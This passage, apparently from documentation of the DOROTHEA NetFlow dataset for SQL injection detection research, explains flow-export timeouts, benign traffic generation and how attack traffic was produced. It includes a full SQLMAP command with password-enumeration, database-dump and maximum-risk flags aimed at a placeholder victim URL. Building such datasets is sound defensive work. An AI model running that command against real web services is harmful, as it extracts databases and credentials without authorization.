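The export rule above can be sketched as a small expiry check. This is an illustrative model of the timeout logic only, not DOROTHEA's or ipt_netflow's actual implementation; the `Flow` fields and function names are assumptions.

```python
from dataclasses import dataclass

# Timeouts as configured in DOROTHEA (seconds).
INACTIVE_TIMEOUT = 15
ACTIVE_TIMEOUT = 1800  # 30 minutes

@dataclass
class Flow:
    """One unidirectional flow record, keyed elsewhere by the 5-tuple."""
    first_seen: float
    last_seen: float
    packets: int = 0
    octets: int = 0

def should_export(flow: Flow, now: float) -> bool:
    """Export when idle for 15 s, or when active for 30 min total."""
    inactive = now - flow.last_seen >= INACTIVE_TIMEOUT
    active_too_long = now - flow.first_seen >= ACTIVE_TIMEOUT
    return inactive or active_too_long

f = Flow(first_seen=0.0, last_seen=100.0, packets=12, octets=4096)
print(should_export(f, now=120.0))  # True: idle for 20 s
print(should_export(f, now=110.0))  # False: idle only 10 s, active 110 s
```

The active timeout ensures that long-lived connections still produce periodic flow records instead of a single record at connection teardown.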

Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. These tasks run as Python scripts, which users may customize or extend with their own. The network traffic is managed by a gateway that performs two main tasks: it routes packets to the Internet, and it sends the traffic to a NetFlow data generation node (packets received from the Internet are processed in the same way).

The malicious traffic collected (SQLIA attacks) was generated using SQLMAP, a penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities.

The attacks were executed from 16 nodes, each launching SQLMAP with the parameters in the following table.

    Parameters                Description

    --banner, --current-user, --current-db,
    --hostname, --is-dba, --users, --passwords,
    --privileges, --roles, --dbs, --tables,
    --columns, --schema, --count, --dump,
    --comments                Enumerate users, password hashes, privileges,
                              roles, databases, tables and columns

    --level=5                 Run the most exhaustive set of detection tests

    --risk=3                  Include the riskiest payloads, increasing the
                              probability of extracting data

    --random-agent            Select the User-Agent randomly

    --batch                   Never ask for user input; use the default
                              behavior

    --answers="follow=Y"      Automatically answer the "follow" prompt
                              with yes
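Putting the table's parameters together, a single attack node's invocation can be sketched as below. The target URL is hypothetical (the real victims were vulnerable web forms on the victim network); only the flags come from the table above.

```shell
# Sketch of one attack node's SQLMAP run; the URL is a placeholder.
sqlmap -u "http://victim.example/form.php?id=1" \
  --banner --current-user --current-db --hostname --is-dba \
  --users --passwords --privileges --roles \
  --dbs --tables --columns --schema --count --dump --comments \
  --level=5 --risk=3 --random-agent --batch --answers="follow=Y"
```

The `--batch` and `--answers` flags are what make this runnable unattended across many nodes, since SQLMAP otherwise prompts interactively during enumeration.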

Each node executed SQLIAs against 200 victim nodes. The victim nodes deployed a web form vulnerable to Union-type injection attacks, connected to the MySQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer).

The web service was accessible on ports 443 and 80, the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes, and 126.52.30.0/24 for the victim nodes. The malicious traffic in the two datasets was collected under different conditions. For D1, SQLIAs were performed using Union-based attacks against the MySQL and SQLServer databases.

For D2, however, Blind SQL injection attacks were performed against a web form connected to a PostgreSQL database. The IP address spaces of the networks also differed from those of D1: in D2, the address space was 152.148.48.1/24 for the benign and malicious traffic-generating nodes and 140.30.20.1/24 for the victim nodes.

For the MySQL server, MariaDB version 10.4.12 was used; Microsoft SQL Server 2017 Express and PostgreSQL version 13 served as the other database engines.
